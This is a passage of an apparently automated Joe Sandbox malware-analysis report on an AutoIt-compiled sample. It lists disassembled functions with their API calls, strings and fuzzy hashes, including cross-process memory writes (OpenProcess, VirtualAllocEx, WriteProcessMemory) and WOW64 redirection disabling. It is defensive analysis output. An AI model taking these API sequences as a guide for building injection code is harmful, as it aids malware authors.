Instruction Fuzzy Hash: 8BF0F430015B18EBDB229F1AED4C7583FAAB701326F0CA227F46A495F1C7314595DF54

Function 0063C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0063C432
CoCreateInstance.OLE32(00662D6C,00000000,00000001,00662BDC,?), ref: 0063C44A

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

CoUninitialize.OLE32 ref: 0063C6B7

Strings

.lnk, xrefs: 0063C3C6, 0063C3EE, 0063C3F8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 5ffe56a2d871630fad4aab3cd02de22d3b9815934b4983134489f495f9fd804b
Instruction ID: 36e7cedd24e334168cde563b9ce3044cd55f8746eb91fdc9e08354e4ee95d9c7
Opcode Fuzzy Hash: 5ffe56a2d871630fad4aab3cd02de22d3b9815934b4983134489f495f9fd804b
Instruction Fuzzy Hash: BAA14A71104206AFD310EF58C895EABBBEDFFC9314F00491EF15597292EB71A949CB92

Function 005E2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 005F0DB6: std::exception::exception.LIBCMT ref: 005F0DEC
Part of subcall function 005F0DB6: __CxxThrowException@8.LIBCMT ref: 005F0E01

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 005D7A51: _memmove.LIBCMT ref: 005D7AAB

__swprintf.LIBCMT ref: 005E2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005E2D66

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 788afea8c3c15fa66bc7b40d4b517d87331683165bb6e5196cd56593e957a263
Instruction ID: 064e7b1b7dd0c0774c5fe5b7f5980006eeb1d9e662393fde34074cc2225377e1
Opcode Fuzzy Hash: 788afea8c3c15fa66bc7b40d4b517d87331683165bb6e5196cd56593e957a263
Instruction Fuzzy Hash: C59181711082569FC728EF28C899CBEBBA9FF85310F04491EF5959B3A1EA30ED44C752

Function 0063B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 005D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D4743,?,?,005D37AE,?), ref: 005D4770

CoInitialize.OLE32(00000000), ref: 0063B9BB
CoCreateInstance.OLE32(00662D6C,00000000,00000001,00662BDC,?), ref: 0063B9D4
CoUninitialize.OLE32 ref: 0063B9F1

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

Strings

.lnk, xrefs: 0063B99D, 0063B9AB

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 5d973d4c53b4992c1e4eaf29690fdc65c55a538e721a46d27d8c809421d4c8f9
Instruction ID: e93a38ad7985fcb450f91d74d0153199067b281b8cd5db978e6debc36104f760
Opcode Fuzzy Hash: 5d973d4c53b4992c1e4eaf29690fdc65c55a538e721a46d27d8c809421d4c8f9
Instruction Fuzzy Hash: 61A169756043069FC710DF18C484D5ABBE6FF89714F04895AF99A9B3A1CB31EC45CB91

Function 0062B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0062B4BE

Strings

%f, xrefs: 0062B561
AutoIt3GUI, xrefs: 0062B436
Container, xrefs: 0062B43B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%f
API String ID: 3565006973-1454378043
Opcode ID: 5391eb0934a649a2830b259c0c2e4831d382fe0a8ba1b123163ed471b9d79eeb
Instruction ID: b1b4c2671fafc6223ebe9babbd5e8d25249049cbe9d0af7f59881459fe7ddb72
Opcode Fuzzy Hash: 5391eb0934a649a2830b259c0c2e4831d382fe0a8ba1b123163ed471b9d79eeb
Instruction Fuzzy Hash: 5C915A70600A12AFDB14DF64D884AAABBE6FF48710F24956DE94ADB391DB70E841CF50

Function 005F501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005F50AD

Part of subcall function 006000F0: __87except.LIBCMT ref: 0060012B

Strings

pow, xrefs: 005F5085, 005F50A2

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 4a2abd4eb7f73546fcda41769519b1e0d0a3577fdfe11758ec2632fbc6025082
Instruction ID: 17f7e9f1af06e26e77fd101c8e8f885ec346bf28d4834e42f7c62792884b48b4
Opcode Fuzzy Hash: 4a2abd4eb7f73546fcda41769519b1e0d0a3577fdfe11758ec2632fbc6025082
Instruction Fuzzy Hash: 26517D3094C90696EB197714C80937F2F9BBB40700F208D99E6D5863D9FE788ED4D686

Function 00618584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0061862B
_memmove.LIBCMT ref: 00618685

Strings

3c^, xrefs: 0061860C
_^, xrefs: 006186FF, 0061DFDC, 0061DFF8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove
String ID: 3c^$_^
API String ID: 4104443479-3555050690
Opcode ID: 55a6e33a09378e38cd0643bbdf0c7944d4e983046daefaff5b7e054d7fbbc9b5
Instruction ID: eeb53f4c3a56f3530287db0b9b9a3276381bc865d709fd11f4d3162233554eb4
Opcode Fuzzy Hash: 55a6e33a09378e38cd0643bbdf0c7944d4e983046daefaff5b7e054d7fbbc9b5
Instruction Fuzzy Hash: A1513B70A00619DFCB64CF69C884AEEBBF2FF44304F188529E85AD7350EB31A995CB51

Function 006297F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00629296,?,?,00000034,00000800,?,00000034), ref: 006314E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0062983F

Part of subcall function 00631487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006314B1

Part of subcall function 006313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00631409
Part of subcall function 006313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0062925A,00000034,?,?,00001004,00000000,00000000), ref: 00631419
Part of subcall function 006313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0062925A,00000034,?,?,00001004,00000000,00000000), ref: 0063142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006298AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006298F9

Strings

@, xrefs: 00629911

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 3d063372c1efb0a38cd0bb24d696c1e577aae622380e32116e7a853633c646cb
Instruction ID: 3cbc03fda926d404811c817639ce1273b879d21f08d206f3a4f012e3fdecd4b0
Opcode Fuzzy Hash: 3d063372c1efb0a38cd0bb24d696c1e577aae622380e32116e7a853633c646cb
Instruction Fuzzy Hash: 35415E76901218AFDB10DFA4CD85ADEBBB9EF4A300F044099F945B7281DA716E85CFA0

Function 00657946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0065F910,00000000,?,?,?,?), ref: 006579DF
GetWindowLongW.USER32 ref: 006579FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00657A0C

Strings

SysTreeView32, xrefs: 006579B1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a7d7e003b1ae8abb9282098fb8c50287d068ec807f2cabad38dc4662395c22a1
Instruction ID: b0937294ce9364423db0f294ea1a32f38f91237216a33254ad073a654897973d
Opcode Fuzzy Hash: a7d7e003b1ae8abb9282098fb8c50287d068ec807f2cabad38dc4662395c22a1
Instruction Fuzzy Hash: 3031D031204606AFDB119F38DC45BEA7BAAFF45325F204725F875932E0D730E9558B60

Function 00657A71 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00657B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00657B76

Strings

P[, xrefs: 00657B19
', xrefs: 00657ACA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend
String ID: '$P[
API String ID: 3850602802-1533489919
Opcode ID: c313be9e560a5a205dda71b2b06fcc3a6f7170c97d08c69d7a4ed9722a65c069
Instruction ID: f0f279ffa34b7c74357254f78b3d8a35a47e42c2253a274145f7731d9a3827bc
Opcode Fuzzy Hash: c313be9e560a5a205dda71b2b06fcc3a6f7170c97d08c69d7a4ed9722a65c069
Instruction Fuzzy Hash: 45410874A0530A9FDB14CF65D981BDABBBAFB08301F10016AED05AB351D771AA55CF90

Function 006573D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00657461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00657475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00657499

Strings

SysMonthCal32, xrefs: 0065742C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d51f38d98f946bf33ff3ab9f663dda596822d81ac55d04ae8f74f38e61ee5981
Instruction ID: fcfa0c80e1ee4dc03e611305b1ac01cd8f700f2256eed1f1a309410206bd6ab9
Opcode Fuzzy Hash: d51f38d98f946bf33ff3ab9f663dda596822d81ac55d04ae8f74f38e61ee5981
Instruction Fuzzy Hash: 5621BF32500218ABDF11CFA4DC46FEA3BAAEB48725F110214FE156B190DA75AC55DBA0

Function 00656CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00656D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00656D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00656D70

Strings

Listbox, xrefs: 00656D08

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 2a0132639171ee552a50eb67683aa981878caf55ee78bb7472ec3c755c7450d6
Instruction ID: cf176213940f382f8919ea3a795910bb2d4a9bb3520a930d42de832254b5dbdb
Opcode Fuzzy Hash: 2a0132639171ee552a50eb67683aa981878caf55ee78bb7472ec3c755c7450d6
Instruction Fuzzy Hash: A021B032600118BFDF118F54CC45EEB3BBBEF89751F418228F9459B2A0C6719C55CBA0

Function 006439E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00643A66

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Strings

%f, xrefs: 006439F4
, $, xrefs: 00643AA6
AUTOITCALLVARIABLE%d, xrefs: 00643A58

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%f
API String ID: 3506404897-1950759109
Opcode ID: 8791f09479ed59c60840d46458dd43ebb5fb57e1c5c6e7a9101d727a97c8b57f
Instruction ID: d00e4d383ddade9c6087f35628292e1ad372a9b6a962b5406979298a28ddce84
Opcode Fuzzy Hash: 8791f09479ed59c60840d46458dd43ebb5fb57e1c5c6e7a9101d727a97c8b57f
Instruction Fuzzy Hash: 5421753165021AAFCF10EF58CC86AAD7BB6BF44700F500456F545AB341DB30EA45CB65

Function 0065770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00657772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00657787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00657794

Strings

msctls_trackbar32, xrefs: 00657749

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c98c95a027b5f9b93c0e66ce179ba0ba39e189d5b4e17f698f6dd8a6ab72137a
Instruction ID: 08e0d5ff530a48e640e5d0a8f6bbfd980b2a7684a5a2d4d2e89b58d8e8f018e9
Opcode Fuzzy Hash: c98c95a027b5f9b93c0e66ce179ba0ba39e189d5b4e17f698f6dd8a6ab72137a
Instruction Fuzzy Hash: 10113A72200208BFEF205F64EC05FEB37AEEF8CB55F010119FA4196190D271E811CB20

Function 005F6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 005F6B93
__calloc_crt.LIBCMT ref: 005F6BAC

Strings

@Bi, xrefs: 005F6BC3
h, xrefs: 005F6BD1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __calloc_crt
String ID: h$@Bi
API String ID: 3494438863-1321788284
Opcode ID: 139cb012e0296e14956a4ba5efd7977e0226c53479a36c50958a03af43dd8bb1
Instruction ID: 4745cdebda7050e63363c0dd5002c53521dd0304374a92233dadd89bdc11a4ab
Opcode Fuzzy Hash: 139cb012e0296e14956a4ba5efd7977e0226c53479a36c50958a03af43dd8bb1
Instruction Fuzzy Hash: A1F09672209A1A8BF765AF68BC51B722F9AF755730F60041BE701DF590EB78C98187C4

Function 0065ACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,006957B0,0065D809,000000FC,?,00000000,00000000,?,?,?,0060B969,?,?,?,?,?), ref: 0065ACD1
GetFocus.USER32 ref: 0065ACD9

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

Part of subcall function 005D25DB: GetWindowLongW.USER32(?,000000EB), ref: 005D25EC

SendMessageW.USER32(00EBE878,000000B0,000001BC,000001C0), ref: 0065AD4B

Strings

P[, xrefs: 0065AD12, 0065AD23

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: P[
API String ID: 3601265619-2517523118
Opcode ID: 8c4ad508245a89ce94e359fa380af7af9be6f8b7a733f777b8b597b86f079440
Instruction ID: c28ec0006296f821774e42eda3a042eb338a794e603aa398c2c55ad0c3dd5323
Opcode Fuzzy Hash: 8c4ad508245a89ce94e359fa380af7af9be6f8b7a733f777b8b597b86f079440
Instruction Fuzzy Hash: 170148312016109FC715EF28D898A9577E7FF89322F140369F816877B1DB31AC46CB51

Function 00611935 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00611775

Part of subcall function 0064BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0061195E,?), ref: 0064BFFE
Part of subcall function 0064BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0064C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0061196D

Strings

xq, xrefs: 00611935
WIN_XPe, xrefs: 00611788

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe$xq
API String ID: 582185067-2909513472
Opcode ID: 7a417155985051968309d61e1d8f7b962f035fdedf2a3338b1e170710996077a
Instruction ID: d464a5660b89fba8cf5aed373163cf95eb4e8ca10c612594129bf4c612f39122
Opcode Fuzzy Hash: 7a417155985051968309d61e1d8f7b962f035fdedf2a3338b1e170710996077a
Instruction Fuzzy Hash: FDF0C970800109DFDB25DBA5C988AECBBFABB09301F581096E202A6290DB718F85DF61

Function 005D4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005D4BD0,?,005D4DEF,?,006952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005D4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005D4C23

Strings

kernel32.dll, xrefs: 005D4C0C
Wow64DisableWow64FsRedirection, xrefs: 005D4C1D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: a613039fe1793df3146268855a9e346770a9986fa07c9b1ae78c0c7ca6e6ade5
